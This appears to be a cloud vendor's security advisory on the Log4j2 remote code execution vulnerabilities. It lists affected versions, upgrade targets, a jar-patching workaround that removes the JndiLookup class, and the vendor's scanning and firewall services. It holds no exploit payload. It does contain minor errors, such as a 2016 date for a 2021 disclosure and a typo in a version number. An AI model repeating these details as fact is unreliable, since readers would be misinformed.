Apache Log4j2 Remote Code Execution Vulnerability (CVE-2021-44228 and CVE-2021-45046)

Dec 10, 2021 GMT+08:00

I.Overview

Apache Log4j2 has a remote code execution vulnerability (CVE-2021-44228). Apache Log4j2 processes user input during log processing. Attackers can construct special requests to trigger remote code execution. The POC has been disclosed and the risk is high.

On December 16, 2016, Apache Log4j2 team has disclosed that versions earlier than 2.16.0 had a remote code execution vulnerability (CVE-2021-45046) in addition to the DoS vulnerability.

Apache Log4j2 is a widely used Java-based logging utility. If you are an Apache Log4j2 user, check your system and implement timely security hardening.

Reference: Apache Log4j Security Vulnerabilities

II.Severity

Severity: important

(Severity: low, moderate, important, and critical)

III. Affected Products

Affected versions:

2.0-beat9 <= Apache Log4j 2.x < 2.16.0 (Version 2.12.2 is not affected.)

Upgrade affected applications and components, such as spring-boot-starter-log4j2, Apache Solr, Apache Flink, and Apache Druid.

Secure versions:

Apache Log4j 1.x is not affected.

Apache Log4j 2.16.0

IV. Vulnerability Handling

This vulnerability has been fixed in the official version. Upgrade all applications related to Apache Log4j2 to a secure version as soon as possible. Link: https://logging.apache.org/log4j/2.x/download.html

Java 8 (or later) users should upgrade to release 2.16.0.

Java 7 users should upgrade to release 2.12.2.

If the upgrade cannot be performed in a timely manner, run the following command to remove the JndiLookup class from the classpath：zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class. Then, restart the service.

Note: Before fixing vulnerabilities, back up your files and conduct a thorough test.

The following HUAWEI CLOUD security services keep scanning for this vulnerability and its variant attacks. You can enable protection in the following services:

1. Web Application Firewall (WAF) can defend against attacks exploiting this vulnerability. Set the Mode to Block in the Basic Web Protection configuration area. For details, see Configuring Basic Web Protection Rules.

2. HUAWEI CLOUD Host Security Service (HSS) can scan applications for the vulnerability. Log in to the HSS console, choose Web Tamper Protection > Server Protection, and enable dynamic Web Tamper Protection for your servers. For details, see Enabling Web Tamper Protection.

3. HUAWEI CLOUD Container Guard Service (CGS) can scan private images for the vulnerability. The basic edition is free of charge. Log in to the CGS console, choose Image Security, click the Image Vulnerabilities tab, and click the Private Image Vulnerabilities tab. For details, see Managing Private Image Vulnerabilities.